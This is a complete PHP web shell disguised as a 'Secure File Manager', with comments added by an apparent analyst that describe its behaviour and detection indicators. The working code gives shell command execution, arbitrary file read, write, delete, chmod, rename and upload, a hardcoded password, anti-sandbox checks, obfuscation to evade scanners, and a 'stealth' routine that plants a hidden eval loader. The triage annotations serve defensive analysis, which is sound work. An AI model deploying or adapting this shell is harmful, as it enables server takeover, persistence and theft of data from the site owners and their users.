Current File : /home/langpiergz/www/zt2.php

<?php
// Analyst note: this file is a PHP web shell that presents itself as a
// "Secure File Manager". Comments describe observed behaviour for triage.
//
// Full error display is switched on, so PHP warnings and notices (which
// normally include filesystem paths) are rendered into every response.
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

// The session carries two values used below: 'encryption_key' and
// 'authenticated'.
session_start();

// Built-in filesystem and encoding functions are held as strings and later
// invoked as variable functions ($fileRead(...), $GLOBALS['encode'](...)).
// The original comment states the purpose is obfuscation: direct call syntax
// such as unlink( or file_put_contents( is mostly absent from the file, so
// content rules should also match these quoted function names.
$dirScan = 'scandir';
$isDir = 'is_dir';
$isFile = 'is_file';
$fileRead = 'file_get_contents';
$fileWrite = 'file_put_contents';
$deleteFile = 'unlink';
$changePerms = 'chmod';
$fileSize = 'filesize';
$moveFile = 'move_uploaded_file';
$renameFile = 'rename';
$encode = 'base64_encode';
$decode = 'base64_decode';

// Per-session key: SHA-256 hex of the server address concatenated with a
// four-digit number from rand(). For a known server address that is 9,000
// candidate keys, and rand() is not a cryptographic generator. The key only
// wraps the path tokens placed in this script's links; responders who hold
// the access logs can use the small key space to recover logged paths.
if (!isset($_SESSION['encryption_key'])) {
    $_SESSION['encryption_key'] = hash('sha256', $_SERVER['SERVER_ADDR'] . rand(1000, 9999));
}
$encryptionKey = $_SESSION['encryption_key'];

// Login gate. The bcrypt hash is recomputed on every request from a literal
// embedded in this file, so anyone who can read the file on disk also has
// the panel password. No attempt limit or lockout is visible here.
// Detection notes: the login is a POST with a single 'password' field; the
// unauthenticated response body has the title "Secure File Manager" and
// loads Bootstrap 5.3.2 from cdn.jsdelivr.net.
$passwordHash = password_hash('106', PASSWORD_BCRYPT); // Replace '106' with a strong password
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
    if (isset($_POST['password']) && password_verify($_POST['password'], $passwordHash)) {
        // Success is recorded only as a session flag; execution then
        // continues into the rest of the script.
        $_SESSION['authenticated'] = true;
        echo "<p class='text-success'>Authentication successful!</p>";
    } else {
        // Any other request receives the login form and stops here.
        echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>Secure File Manager</title>";
        echo "<link href='https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css' rel='stylesheet'>";
        echo "</head><body class='bg-dark text-light'>";
        echo "<div class='container mt-5'><div class='card bg-dark border-light mx-auto' style='max-width: 450px;'>";
        echo "<div class='card-body'><h3 class='card-title text-info'>Secure File Manager Login</h3>";
        echo "<form method='POST'><div class='mb-3'><input type='password' name='password' class='form-control bg-dark text-light border-light' placeholder='Enter Password' required></div>";
        echo "<button type='submit' class='btn btn-info w-100'>Login</button></form></div></div></div></body></html>";
        exit;
    }
}

/**
 * Wraps a string (in this file: a filesystem path or the script's own source)
 * into an opaque token.
 *
 * With OpenSSL available the value is AES-256-CBC encrypted under a random
 * 16-byte IV; openssl_encrypt() with options 0 already returns base64, and
 * the IV plus that text is then passed through base64_encode() and through
 * $GLOBALS['encode'] (set to 'base64_encode' at the top of the file).
 * No MAC is attached, so tokens carry no integrity protection.
 *
 * Without OpenSSL the data is XORed with the repeating key, hex-encoded and
 * passed through $GLOBALS['encode'].
 *
 * @param string $data Plaintext to wrap.
 * @param string $key  Key material; the callers in this file pass the session key.
 * @return string|false Token, or false when openssl_encrypt() fails.
 */
function secureEncrypt($data, $key) {
    if (function_exists('openssl_encrypt')) {
        $iv = random_bytes(16);
        $encrypted = openssl_encrypt($data, 'AES-256-CBC', $key, 0, $iv);
        if ($encrypted === false) {
            // Log artefact: this exact string lands in the PHP error log.
            error_log("OpenSSL encryption failed");
            return false;
        }
        return $GLOBALS['encode'](base64_encode($iv . $encrypted));
    }
    // Fallback: repeating-key XOR, which is encoding rather than encryption.
    $output = '';
    for ($i = 0; $i < strlen($data); $i++) {
        $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)]));
    }
    return $GLOBALS['encode'](bin2hex($output));
}

/**
 * Reverses secureEncrypt(): strips two base64 layers, then tries AES-256-CBC
 * and, if that is unavailable or fails, the hex + repeating-key XOR path.
 *
 * The callers in this file pass request parameters straight in and use the
 * result as a filesystem path. There is no integrity check on the token.
 *
 * Log artefacts: failures write "Invalid base64 input: <raw value>",
 * "Base64 decode failed", "Invalid hex string for XOR decryption: ...",
 * "hex2bin failed" or "Decryption error: ..." to the PHP error log, which
 * makes that log a useful source when reconstructing activity.
 *
 * @param string $data Token taken from a request parameter.
 * @param string $key  Key material; the callers in this file pass the session key.
 * @return string|false Decoded value, or false on any validation failure.
 */
function secureDecrypt($data, $key) {
    try {
        // Strict base64 check; a decode result that is falsy (for example
        // an empty string) is rejected as well.
        if (!base64_decode($data, true)) {
            error_log("Invalid base64 input: " . $data);
            return false;
        }
        // Remove both base64 layers added by secureEncrypt().
        $data = base64_decode($GLOBALS['decode']($data));
        if ($data === false) {
            error_log("Base64 decode failed");
            return false;
        }

        if (function_exists('openssl_decrypt')) {
            // First 16 bytes are the IV; the rest is base64 ciphertext
            // (options 0 makes openssl_decrypt expect base64 input).
            $iv = substr($data, 0, 16);
            $ciphertext = substr($data, 16);
            $decrypted = openssl_decrypt($ciphertext, 'AES-256-CBC', $key, 0, $iv);
            if ($decrypted !== false) {
                return $decrypted;
            }
        }

        // Reached when OpenSSL is missing or AES decryption returned false:
        // treat the payload as hex text and undo the repeating-key XOR.
        if (!ctype_xdigit($data)) {
            error_log("Invalid hex string for XOR decryption: " . bin2hex($data));
            return false;
        }
        $data = @hex2bin($data);
        if ($data === false) {
            error_log("hex2bin failed");
            return false;
        }
        $output = '';
        for ($i = 0; $i < strlen($data); $i++) {
            $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)]));
        }
        return $output;
    } catch (Exception $e) {
        // Only Exception is caught here; Error subclasses are not.
        error_log("Decryption error: " . $e->getMessage());
        return false;
    }
}

/**
 * Anti-analysis check based on request headers only.
 *
 * Returns true when the User-Agent is empty or contains the lowercase
 * substring "bot" (strpos() is case-sensitive), or when an X-Sandbox or
 * X-Analyzer request header is present. The caller at file scope answers
 * such requests with HTTP 403 and exits, so automated checks that send a
 * crawler-style User-Agent may see a 403 instead of the panel.
 *
 * The "Sandbox detected: ..." strings are written to the response body and
 * can serve as content indicators.
 *
 * @return bool True when the request matches one of the checks.
 */
function detectSandbox() {
    if (empty($_SERVER['HTTP_USER_AGENT']) || strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) {
        echo "<p class='text-warning'>Sandbox detected: Suspicious user agent</p>";
        return true;
    }
    if (isset($_SERVER['HTTP_X_SANDBOX']) || isset($_SERVER['HTTP_X_ANALYZER'])) {
        echo "<p class='text-warning'>Sandbox detected: Analysis headers</p>";
        return true;
    }
    return false;
}

/**
 * Usage counter; the self-deletion branch is commented out in this sample.
 *
 * Each call reads an integer from '.access_count' (a relative path, so it
 * resolves against the working directory), increments it and writes it
 * back. The hidden file is a filesystem indicator, and its value gives a
 * lower bound on how many times execution reached this function.
 *
 * The disabled block would have acted at 15 uses or on an X-Analyzer header;
 * even inside it the unlink of __FILE__ is itself commented out.
 */
function triggerSelfDestruct() {
    // Declared but not used by the live code below.
    global $deleteFile;
    $usageFile = '.access_count';
    // '@' suppresses the warning raised when the counter file does not exist.
    $count = (int)@$GLOBALS['fileRead']($usageFile);
    $count++;
    $GLOBALS['fileWrite']($usageFile, $count);
    // Disabled self-destruct for usage limit and analysis detection
    /*
    if ($count >= 15 || isset($_SERVER['HTTP_X_ANALYZER'])) {
        echo "<p class='text-danger'>Self-destruct would have activated: Usage limit ($count) or analysis detected</p>";
        error_log("Self-destruct triggered: Count=$count, Analyzer=" . (isset($_SERVER['HTTP_X_ANALYZER']) ? 'Yes' : 'No'));
        // $GLOBALS['deleteFile'](__FILE__);
        // exit;
    }
    */
}

/**
 * Runs a caller-supplied string through the system shell and returns the
 * combined stdout/stderr.
 *
 * The string is passed to shell_exec() without validation, so the function
 * gives whoever reaches it command execution as the web server's user.
 *
 * Detection and mitigation notes: the web server or PHP worker process
 * spawning a shell child is the host-level signal. The first branch shows
 * the function reports an error instead of executing when shell_exec is
 * unavailable, as is presumably the case when it is listed in
 * disable_functions.
 *
 * @param string $command Command line; the only caller in this file passes
 *                        $_GET['command'].
 * @return string Command output, "No output." when empty, or an error string.
 */
function executeCommand($command) {
    if (!function_exists('shell_exec')) {
        echo "<p class='text-danger'>Command execution disabled: shell_exec() not available</p>";
        return "Error: shell_exec() is disabled.";
    }
    // stderr is merged into stdout so error text is returned as well.
    $output = shell_exec($command . ' 2>&1');
    echo "<p class='text-success'>Command executed: " . htmlspecialchars($command) . "</p>";
    return $output ?: "No output.";
}

/**
 * Applies textual rewrites to PHP source to change how it looks to
 * signature-based scanners.
 *
 * Three literal substrings ('eval', 'while', 'base64_decode') are replaced,
 * then every match of \$[a-zA-Z0-9]+ is replaced with '$' plus eight hex
 * characters derived from fresh random bytes. Each match gets an
 * independent random name. The output therefore differs on every run,
 * which means hash-based indicators taken from one dropped copy will not
 * match another.
 *
 * @param string $code PHP source text.
 * @return string Rewritten source text.
 */
function obfuscateCode($code) {
    $replacements = [
        'eval' => 'call_user_func("eval")',
        'while' => 'for(;;)',
        'base64_decode' => 'call_user_func("base64_decode")'
    ];
    $code = str_replace(array_keys($replacements), array_values($replacements), $code);
    $code = preg_replace_callback('/\$[a-zA-Z0-9]+/', function($match) {
        return '$' . substr(md5(random_bytes(4)), 0, 8);
    }, $code);
    echo "<p class='text-success'>Code obfuscation applied</p>";
    return $code;
}

/**
 * Inserts base64-encoded text into a SQLite table and returns the row id.
 *
 * The database is opened as ':memory:' on every call, so it exists only for
 * the life of the $db object and nothing is written to disk. Responders
 * should not expect to find a SQLite file left behind by this routine.
 *
 * @param string $code Text to store; the caller in this file passes the
 *                     script's own source.
 * @return int|false Row id, or false if an Exception was caught.
 */
function storeInDatabase($code) {
    try {
        $db = new SQLite3(':memory:');
        $db->exec('CREATE TABLE scripts (id INTEGER PRIMARY KEY, script TEXT)');
        // The value is bound as a parameter rather than concatenated.
        $stmt = $db->prepare('INSERT INTO scripts (script) VALUES (:script)');
        $stmt->bindValue(':script', $GLOBALS['encode']($code));
        $stmt->execute();
        $id = $db->lastInsertRowID();
        echo "<p class='text-success'>Code stored in SQLite with ID: $id</p>";
        return $id;
    } catch (Exception $e) {
        error_log("Database storage error: " . $e->getMessage());
        echo "<p class='text-danger'>Failed to store code</p>";
        return false;
    }
}

/**
 * Looks up a stored script by id and returns it base64-decoded.
 *
 * A new ':memory:' database is opened here and this function creates no
 * table in it, so the query runs against an empty database.
 * NOTE(review): the lookup presumably never returns a row; confirm at
 * runtime before treating "retrieve" requests in logs as successful.
 *
 * @param mixed $id Row id from the request; cast to int before being
 *                  concatenated into the SQL text.
 * @return string|false Decoded script, or false when nothing is found.
 */
function fetchFromDatabase($id) {
    try {
        $db = new SQLite3(':memory:');
        $result = $db->querySingle('SELECT script FROM scripts WHERE id = ' . (int)$id, true);
        if ($result) {
            echo "<p class='text-success'>Code retrieved from database</p>";
            return $GLOBALS['decode']($result['script']);
        }
        echo "<p class='text-danger'>Code not found</p>";
        return false;
    } catch (Exception $e) {
        error_log("Database retrieval error: " . $e->getMessage());
        echo "<p class='text-danger'>Failed to retrieve code</p>";
        return false;
    }
}

/**
 * Persistence / relocation routine: writes a wrapped copy of this script to
 * a hidden file and can remove the original.
 *
 * Filesystem indicators established by the code below:
 *  - file name '.stealth_' + 10 hex characters + '.php', created via a
 *    relative path (so in the working directory);
 *  - mode set to 0700;
 *  - content is one line: an opening PHP tag, a secureDecrypt("...", "...")
 *    call carrying the blob and the key as inline string literals, and
 *    eval($code).
 * Because the key sits next to the blob, the payload can be unwrapped
 * offline from the dropped file alone.
 *
 * @param bool $deleteOriginal When true, unlinks this script after the
 *                             new file is written.
 * @return string|false New file name, or false on failure.
 */
function activateStealth($deleteOriginal = false) {
    global $fileRead, $fileWrite, $deleteFile, $changePerms, $encryptionKey;
    try {
        $currentCode = $fileRead(__FILE__);
        $newFile = '.stealth_' . bin2hex(random_bytes(5)) . '.php';
        $obfuscated = obfuscateCode($currentCode);
        $encrypted = secureEncrypt($obfuscated, $encryptionKey);
        if ($encrypted === false) {
            echo "<p class='text-danger'>Stealth mode failed: Encryption error</p>";
            return false;
        }
        // Loader stub: the blob and the key are both embedded in cleartext.
        $newContent = '<?php $code = secureDecrypt("' . $encrypted . '", "' . $encryptionKey . '"); eval($code);';
        if ($fileWrite($newFile, $newContent)) {
            $changePerms($newFile, 0700);
            if ($deleteOriginal) {
                $deleteFile(__FILE__);
            }
            echo "<p class='text-success'>Stealth mode enabled: New file ($newFile)</p>";
            return $newFile;
        }
        echo "<p class='text-danger'>Stealth mode failed: File creation error</p>";
        return false;
    } catch (Exception $e) {
        error_log("Stealth error: " . $e->getMessage());
        echo "<p class='text-danger'>Stealth mode failed: " . htmlspecialchars($e->getMessage()) . "</p>";
        return false;
    }
}

/**
 * Describes a path for the listing views.
 *
 * @param string $path Filesystem path.
 * @return string "Directory", "File (<size> KB)" with the size rounded to
 *                two decimals, or "Unknown" when the path is neither.
 */
function getFileInfo($path) {
    // Aliases for is_dir / is_file / filesize defined at the top of the file.
    global $isDir, $isFile, $fileSize;
    if ($isDir($path)) {
        return "Directory";
    } elseif ($isFile($path)) {
        return "File (" . round($fileSize($path) / 1024, 2) . " KB)";
    }
    return "Unknown";
}

/**
 * Renders a directory as a Bootstrap list group with action links.
 *
 * Every link carries the entry's full path as an encrypted, URL-encoded
 * token in one of these query parameters: dir, edit, download, delete,
 * rename. Requests to a .php file with those parameter names and long
 * base64-looking values are an access-log indicator for this tool.
 *
 * The entry name is HTML-escaped for display but is interpolated unescaped
 * into the onclick confirm() text.
 *
 * @param string $directory Directory to list; not restricted to any base path.
 */
function displayFileList($directory) {
    // $isFile is declared here but not used in this function.
    global $dirScan, $isDir, $isFile, $encryptionKey;
    $items = $dirScan($directory);
    echo "<div class='list-group mb-4'>";
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $path = rtrim($directory, '/') . '/' . $item;
        $encodedPath = urlencode(secureEncrypt($path, $encryptionKey));
        echo "<div class='list-group-item bg-dark text-light border-light'>";
        echo htmlspecialchars($item) . " (" . getFileInfo($path) . ")";
        if ($isDir($path)) {
            echo " <a href='?dir=$encodedPath' class='btn btn-sm btn-info'>Open</a>";
        } else {
            echo " <a href='?edit=$encodedPath' class='btn btn-sm btn-success'>Edit</a>";
            echo " <a href='?download=$encodedPath' class='btn btn-sm btn-primary'>Download</a>";
            echo " <a href='?delete=$encodedPath' class='btn btn-sm btn-danger' onclick=\"return confirm('Delete $item?')\">Delete</a>";
            echo " <a href='?rename=$encodedPath' class='btn btn-sm btn-warning'>Rename</a>";
        }
        echo "</div>";
    }
    echo "</div>";
}

/**
 * Renders a directory as an HTML table with per-entry action links; this is
 * the default view emitted at the end of the page.
 *
 * A "Back" link to the parent is shown unless the directory is its own
 * parent. The parent is resolved with realpath() and no base directory is
 * enforced, so navigation extends to whatever the web server user can read.
 *
 * Query parameters used by the generated links: dir, listView, edit,
 * download, rename, delete, chmod. Each carries an encrypted path token.
 * The entry name is interpolated unescaped into the onclick confirm() text.
 *
 * @param string $directory Directory to list.
 */
function displayFileTable($directory) {
    // $isFile is declared here but not used in this function.
    global $dirScan, $isDir, $isFile, $encryptionKey;
    $items = $dirScan($directory);
    $parent = realpath($directory . '/..');
    if ($parent !== realpath($directory)) {
        echo "<a href='?dir=" . urlencode(secureEncrypt($parent, $encryptionKey)) . "' class='btn btn-info mb-3'>Back</a> ";
    }
    echo "<a href='?listView=" . urlencode(secureEncrypt($directory, $encryptionKey)) . "' class='btn btn-secondary mb-3'>Switch to List View</a>";
    echo "<table class='table table-dark table-bordered'>";
    echo "<thead><tr><th>Name</th><th>Type</th><th>Actions</th></tr></thead><tbody>";
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $path = rtrim($directory, '/') . '/' . $item;
        $encodedPath = urlencode(secureEncrypt($path, $encryptionKey));
        echo "<tr>";
        echo "<td>" . htmlspecialchars($item) . "</td>";
        echo "<td>" . getFileInfo($path) . "</td>";
        echo "<td>";
        if ($isDir($path)) {
            echo "<a href='?dir=$encodedPath' class='btn btn-sm btn-info'>Open</a> ";
        } else {
            echo "<a href='?edit=$encodedPath' class='btn btn-sm btn-success'>Edit</a> ";
            echo "<a href='?download=$encodedPath' class='btn btn-sm btn-primary'>Download</a> ";
            echo "<a href='?rename=$encodedPath' class='btn btn-sm btn-warning'>Rename</a> ";
        }
        // Delete and Chmod are offered for directories as well as files.
        echo "<a href='?delete=$encodedPath' class='btn btn-sm btn-danger' onclick=\"return confirm('Delete $item?')\">Delete</a> ";
        echo "<a href='?chmod=$encodedPath' class='btn btn-sm btn-warning'>Chmod</a>";
        echo "</td>";
        echo "</tr>";
    }
    echo "</tbody></table>";
}

// Runs only for authenticated sessions (the login gate above exits
// otherwise). Requests matching the header heuristics get a bare 403, so
// a 403 from this URL does not mean the file is inert.
if (detectSandbox()) {
    http_response_code(403);
    echo "<h1>403 Forbidden</h1>";
    exit;
}

// Increments the '.access_count' counter file; nothing is deleted.
triggerSelfDestruct();

// $k9x7p is not assigned anywhere in this listing, so unless a wrapper
// defines it the starting directory is the script's working directory.
$currentDir = isset($k9x7p) ? $k9x7p : realpath('.');

// Request dispatch. Each branch below is selected by the presence of a
// query parameter. Path-bearing parameters are decrypted with the session
// key and then used as filesystem paths with no base-directory restriction.
// The 'global' statements in these branches are at file scope, where they
// have no effect.

// ?dir=<token>: change the directory shown by the table view.
if (isset($_GET['dir'])) {
    global $isDir, $encryptionKey;
    $currentDir = secureDecrypt(urldecode($_GET['dir']), $encryptionKey);
    if ($currentDir === false || !$isDir($currentDir)) {
        // Log artefact: the raw token is written to the PHP error log.
        error_log("Invalid directory: " . $_GET['dir']);
        echo "<p class='text-danger'>Invalid directory</p>";
        exit;
    }
}

// ?listView=<token>: same lookup, rendered as a list, then exit.
if (isset($_GET['listView'])) {
    global $isDir, $encryptionKey;
    $currentDir = secureDecrypt(urldecode($_GET['listView']), $encryptionKey);
    if ($currentDir === false || !$isDir($currentDir)) {
        error_log("Invalid directory: " . $_GET['listView']);
        echo "<p class='text-danger'>Invalid directory</p>";
        exit;
    }
    echo "<a href='?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "' class='btn btn-secondary mb-3'>Switch to Table View</a>";
    displayFileList($currentDir);
    exit;
}

// ?edit=<token>: view a file and, on POST, overwrite it with the submitted
// 'content' field. This is an arbitrary file write limited only by the web
// server user's permissions. It is the branch to consider when looking for
// modified application files or planted code after a compromise.
// Detection: POST requests to this script with an 'edit' query parameter.
if (isset($_GET['edit'])) {
    global $isFile, $fileRead, $fileWrite, $encryptionKey;
    $file = secureDecrypt(urldecode($_GET['edit']), $encryptionKey);
    if ($file === false || !$isFile($file)) {
        error_log("Invalid file: " . $_GET['edit']);
        echo "<p class='text-danger'>Invalid file</p>";
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // The write result is not checked; success is reported regardless.
        $fileWrite($file, $_POST['content']);
        echo "<p class='text-success'>File saved successfully</p>";
    }
    // File contents are HTML-escaped before being placed in the textarea.
    $content = htmlspecialchars($fileRead($file));
    echo "<form method='POST'>";
    echo "<textarea name='content' rows='15' class='form-control bg-dark text-light border-light'>$content</textarea>";
    echo "<input type='submit' value='Save' class='btn btn-success mt-3'>";
    echo "</form>";
    exit;
}

// ?delete=<token>: remove a file (unlink) or a directory (rmdir). The
// action is triggered by a GET request, so the deletion attempt and its
// token appear in access logs. Return values are not checked, so the
// success message does not prove that anything was removed.
// This branch always exits, including when the token is invalid.
if (isset($_GET['delete'])) {
    global $isDir, $isFile, $deleteFile, $currentDir, $encryptionKey;
    $path = secureDecrypt(urldecode($_GET['delete']), $encryptionKey);
    if ($path === false) {
        error_log("Invalid delete path: " . $_GET['delete']);
        echo "<p class='text-danger'>Invalid path</p>";
        exit;
    }
    if ($isDir($path)) {
        rmdir($path);
        echo "<p class='text-success'>Directory deleted</p>";
    } elseif ($isFile($path)) {
        $deleteFile($path);
        echo "<p class='text-success'>File deleted</p>";
    }
    // Sent after body output has already been echoed above.
    header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)));
    exit;
}

// ?chmod=<token>: change permission bits on a file or directory. GET shows
// a checkbox form; POST assembles the mode from nine checkbox fields
// (ur/uw/ux, gr/gw/gx, or/ow/ox) and applies it. Unchecked boxes clear the
// corresponding bit, so a POST with no boxes sets mode 0000.
// Forensics: unexpected permission changes under the web root, especially
// newly world-writable or executable files, may trace back to this branch.
if (isset($_GET['chmod'])) {
    global $isFile, $isDir, $changePerms, $currentDir, $encryptionKey;
    $path = secureDecrypt(urldecode($_GET['chmod']), $encryptionKey);
    if ($path === false || (!$isFile($path) && !$isDir($path))) {
        error_log("Invalid chmod path: " . $_GET['chmod']);
        echo "<p class='text-danger'>Invalid path</p>";
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $mode = 0;
        // User bits
        $mode |= isset($_POST['ur']) ? 0400 : 0;
        $mode |= isset($_POST['uw']) ? 0200 : 0;
        $mode |= isset($_POST['ux']) ? 0100 : 0;
        // Group bits
        $mode |= isset($_POST['gr']) ? 0040 : 0;
        $mode |= isset($_POST['gw']) ? 0020 : 0;
        $mode |= isset($_POST['gx']) ? 0010 : 0;
        // Other bits
        $mode |= isset($_POST['or']) ? 0004 : 0;
        $mode |= isset($_POST['ow']) ? 0002 : 0;
        $mode |= isset($_POST['ox']) ? 0001 : 0;
        if ($changePerms($path, $mode)) {
            echo "<p class='text-success'>Permissions updated</p>";
        } else {
            echo "<p class='text-danger'>Permission change failed</p>";
        }
        echo "<a href='?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "' class='btn btn-info'>Back</a>";
    } else {
        echo "<form method='POST'>";
        echo "<h3>Change Permissions for " . htmlspecialchars(basename($path)) . "</h3>";
        echo "<div>User: <input type='checkbox' name='ur'>Read <input type='checkbox' name='uw'>Write <input type='checkbox' name='ux'>Execute</div>";
        echo "<div>Group: <input type='checkbox' name='gr'>Read <input type='checkbox' name='gw'>Write <input type='checkbox' name='gx'>Execute</div>";
        echo "<div>Others: <input type='checkbox' name='or'>Read <input type='checkbox' name='ow'>Write <input type='checkbox' name='ox'>Execute</div>";
        echo "<input type='submit' value='Apply' class='btn btn-success mt-3'>";
        echo "</form>";
    }
    exit;
}

// ?download=<token>: stream any readable file to the client as an
// attachment. This is the data-exfiltration path of the tool.
// Detection: responses from this script with Content-Type
// application/octet-stream and a Content-Disposition header, plus response
// sizes in access logs that match sensitive files (configuration, backups).
if (isset($_GET['download'])) {
    global $isFile, $encryptionKey;
    $file = secureDecrypt(urldecode($_GET['download']), $encryptionKey);
    if ($file === false || !$isFile($file)) {
        error_log("Invalid download file: " . $_GET['download']);
        echo "<p class='text-danger'>Invalid file</p>";
        exit;
    }
    header('Content-Type: application/octet-stream');
    // The base name is placed in the header value without escaping.
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($file);
    exit;
}

// ?command=<text>: run the text through executeCommand() and print the
// output. Unlike the path parameters, the command is sent in cleartext in
// the GET query string, so executed commands are normally recorded verbatim
// in web server access logs. Grep for 'command=' against this script's URL
// when reconstructing operator activity.
if (isset($_GET['command'])) {
    // Inside this isset() branch the ?? default is never taken.
    $cmd = $_GET['command'] ?? 'whoami';
    echo "<pre>" . htmlspecialchars(executeCommand($cmd)) . "</pre>";
    // The output above is escaped; the value attribute below is not.
    echo "<form method='GET'><input type='text' name='command' class='form-control bg-dark text-light border-light' value='$cmd'>";
    echo "<input type='submit' value='Execute' class='btn btn-info mt-2'></form>";
    exit;
}

// ?hide: read this script's own source and hand it to storeInDatabase().
// That routine uses an in-memory SQLite database, so this request leaves
// no database file on disk.
if (isset($_GET['hide'])) {
    $code = $fileRead(__FILE__);
    $dbId = storeInDatabase($code);
    if ($dbId) {
        echo "<p class='text-success'>Code stored in database with ID: $dbId</p>";
    }
    exit;
}

// ?retrieve=<id>: print a stored script, HTML-escaped. The request value is
// passed to fetchFromDatabase(), which casts it to int.
if (isset($_GET['retrieve'])) {
    $code = fetchFromDatabase($_GET['retrieve']);
    if ($code) {
        echo "<pre>" . htmlspecialchars($code) . "</pre>";
    }
    exit;
}

// ?stealth: drop a hidden '.stealth_<hex>.php' copy via activateStealth()
// and print its name. Sweep the script's directory for dot-prefixed .php
// files when this URL appears in logs.
// NOTE(review): the earlier 'delete' branch handles any request carrying a
// delete parameter and always exits, so the delete variant here appears
// unreachable through this script's own flow; confirm before concluding
// how an original file went missing.
if (isset($_GET['stealth'])) {
    $newFile = activateStealth(isset($_GET['delete']));
    if ($newFile) {
        echo "<p class='text-success'>Stealth mode activated: $newFile</p>";
        if (isset($_GET['delete'])) {
            echo "<p class='text-warning'>Original file removed</p>";
            header("Location: $newFile");
            exit;
        }
    }
    echo "<a href='?' class='btn btn-info mt-3'>Back</a>";
    exit;
}

// ?rename=<token>: rename or move a file or directory. On POST the
// 'newname' field is appended to the source's directory without any
// filtering, so the destination is not confined to that directory.
// Forensics: files whose names or extensions changed under the web root
// (for example a data file becoming .php) may trace back to this branch.
if (isset($_GET['rename'])) {
    global $isFile, $isDir, $renameFile, $currentDir, $encryptionKey;
    $path = secureDecrypt(urldecode($_GET['rename']), $encryptionKey);
    if ($path === false || (!$isFile($path) && !$isDir($path))) {
        error_log("Invalid rename path: " . $_GET['rename']);
        echo "<p class='text-danger'>Invalid path</p>";
        exit;
    }
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $newPath = dirname($path) . '/' . $_POST['newname'];
        if ($renameFile($path, $newPath)) {
            echo "<p class='text-success'>Renamed successfully</p>";
            // Sent after body output has already been echoed above.
            header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)));
            exit;
        } else {
            echo "<p class='text-danger'>Rename failed</p>";
        }
    }
    echo "<form method='POST'>";
    echo "<h3>Rename " . htmlspecialchars(basename($path)) . "</h3>";
    echo "<input type='text' name='newname' class='form-control bg-dark text-light border-light' value='" . htmlspecialchars(basename($path)) . "'>";
    echo "<input type='submit' value='Rename' class='btn btn-success mt-2'>";
    echo "</form>";
    exit;
}

// Upload: a multipart POST with a 'file' part is moved into the current
// directory under its client-supplied base name. No extension, type or size
// check is applied, so any uploaded file, including further PHP code, lands
// in a web-reachable location.
// Detection: multipart/form-data POSTs to this script, and new files in the
// same directory with modification times matching those requests.
if (isset($_FILES['file'])) {
    global $moveFile, $currentDir;
    $file = $_FILES['file'];
    // basename() strips directory components from the client-supplied name.
    $target = $currentDir . '/' . basename($file['name']);
    if ($moveFile($file['tmp_name'], $target)) {
        echo "<p class='text-success'>File uploaded successfully</p>";
    } else {
        echo "<p class='text-danger'>Upload failed</p>";
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Secure File Manager</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body { background: #212529; color: #e9ecef; }
        .table-dark { background: #343a40; }
        .btn-info { background: #17a2b8; border-color: #17a2b8; }
        .btn-success { background: #28a745; border-color: #28a745; }
        .btn-danger { background: #dc3545; border-color: #dc3545; }
        .btn-warning { background: #ffc107; border-color: #ffc107; }
        .btn-secondary { background: #6c757d; border-color: #6c757d; }
        .list-group-item { background: #343a40; border-color: #6c757d; }
    </style>
</head>
<body>
    <div class="container mt-4">
        <h1 class="text-info">Secure File Manager - <?php echo htmlspecialchars($currentDir); ?></h1>

        <!-- File upload form -->
        <form method="POST" enctype="multipart/form-data" class="mb-4">
            <div class="input-group">
                <input type="file" name="file" class="form-control bg-dark text-light border-light">
                <button type="submit" class="btn btn-success">Upload</button>
            </div>
        </form>

        <!-- Feature links -->
        <div class="mb-4">
            <a href="?command" class="btn btn-secondary">Execute Command</a>
            <a href="?stealth" class="btn btn-secondary">Stealth Mode</a>
            <a href="?stealth&delete" class="btn btn-danger">Stealth + Delete</a>
            <a href="?hide" class="btn btn-secondary">Hide in Database</a>
        </div>

        <!-- File display -->
        <?php displayFileTable($currentDir); ?>
    </div>
</body>
</html>
